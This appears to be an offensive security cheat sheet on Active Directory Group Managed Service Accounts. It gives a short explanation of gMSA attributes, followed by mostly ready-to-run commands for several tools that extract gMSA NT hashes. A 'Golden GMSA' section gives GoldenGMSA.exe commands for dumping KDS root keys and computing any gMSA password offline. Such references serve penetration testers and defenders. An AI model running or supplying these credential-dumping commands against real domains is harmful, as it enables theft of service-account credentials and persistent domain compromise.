4.3 KiB
Password - GMSA
Reading GMSA Password
User accounts created to be used as service accounts rarely have their password changed. Group Managed Service Accounts (GMSAs) provide a better approach (starting in the Windows 2012 timeframe). The password is managed by AD and automatically rotated every 30 days to a randomly generated password of 256 bytes.
GMSA Attributes in the Active Directory
msDS-GroupMSAMembership
(PrincipalsAllowedToRetrieveManagedPassword
) - stores the security principals that can access the GMSA password.msds-ManagedPassword
- This attribute contains a BLOB with password information for group-managed service accounts.msDS-ManagedPasswordId
- This constructed attribute contains the key identifier for the current managed password data for a group MSA.msDS-ManagedPasswordInterval
- This attribute is used to retrieve the number of days before a managed password is automatically changed for a group MSA.
Extract NT hash from the Active Directory
-
# Use --lsa to get GMSA ID crackmapexec ldap domain.lab -u user -p 'PWD' --gmsa-convert-id 00[...]99 crackmapexec ldap domain.lab -u user -p 'PWD' --gmsa-decrypt-lsa '_SC_GMSA_{[...]}_.....'
-
bloodyAD --host 10.10.10.10 -d crash.lab -u john -p 'Pass123*' get search --filter '(ObjectClass=msDS-GroupManagedServiceAccount)' --attr msDS-ManagedPassword
-
GMSAPasswordReader.exe --accountname SVC_SERVICE_ACCOUNT
-
python3 gMSADumper.py -u User -p Password1 -d domain.local
-
Active Directory Powershell
$gmsa = Get-ADServiceAccount -Identity 'SVC_SERVICE_ACCOUNT' -Properties 'msDS-ManagedPassword' $blob = $gmsa.'msDS-ManagedPassword' $mp = ConvertFrom-ADManagedPasswordBlob $blob $hash1 = ConvertTo-NTHash -Password $mp.SecureCurrentPassword
-
kdejoyce/gMSA_Permissions_Collection.ps1 based on Active Directory PowerShell module
Forging Golden GMSA
One notable difference between a Golden Ticket attack and the Golden GMSA attack is that they no way of rotating the KDS root key secret. Therefore, if a KDS root key is compromised, there is no way to protect the gMSAs associated with it.
⚠️ You can't "force reset" a gMSA password, because a gMSA's password never changes. The password is derived from the KDS root key and ManagedPasswordIntervalInDays
, so every Domain Controller can at any time compute what the password is, what it used to be, and what it will be at any point in the future.
- Using GoldenGMSA
# Enumerate all gMSAs GoldenGMSA.exe gmsainfo # Query for a specific gMSA GoldenGMSA.exe gmsainfo --sid S-1-5-21-1437000690-1664695696-1586295871-1112 # Dump all KDS Root Keys GoldenGMSA.exe kdsinfo # Dump a specific KDS Root Key GoldenGMSA.exe kdsinfo --guid 46e5b8b9-ca57-01e6-e8b9-fbb267e4adeb # Compute gMSA password # --sid <gMSA SID>: SID of the gMSA (required) # --kdskey <Base64-encoded blob>: Base64 encoded KDS Root Key # --pwdid <Base64-encoded blob>: Base64 of msds-ManagedPasswordID attribute value GoldenGMSA.exe compute --sid S-1-5-21-1437000690-1664695696-1586295871-1112 # requires privileged access to the domain GoldenGMSA.exe compute --sid S-1-5-21-1437000690-1664695696-1586295871-1112 --kdskey AQAAALm45UZXyuYB[...]G2/M= # requires LDAP access GoldenGMSA.exe compute --sid S-1-5-21-1437000690-1664695696-1586295871-1112 --kdskey AQAAALm45U[...]SM0R7djG2/M= --pwdid AQAAA[..]AAA # Offline mode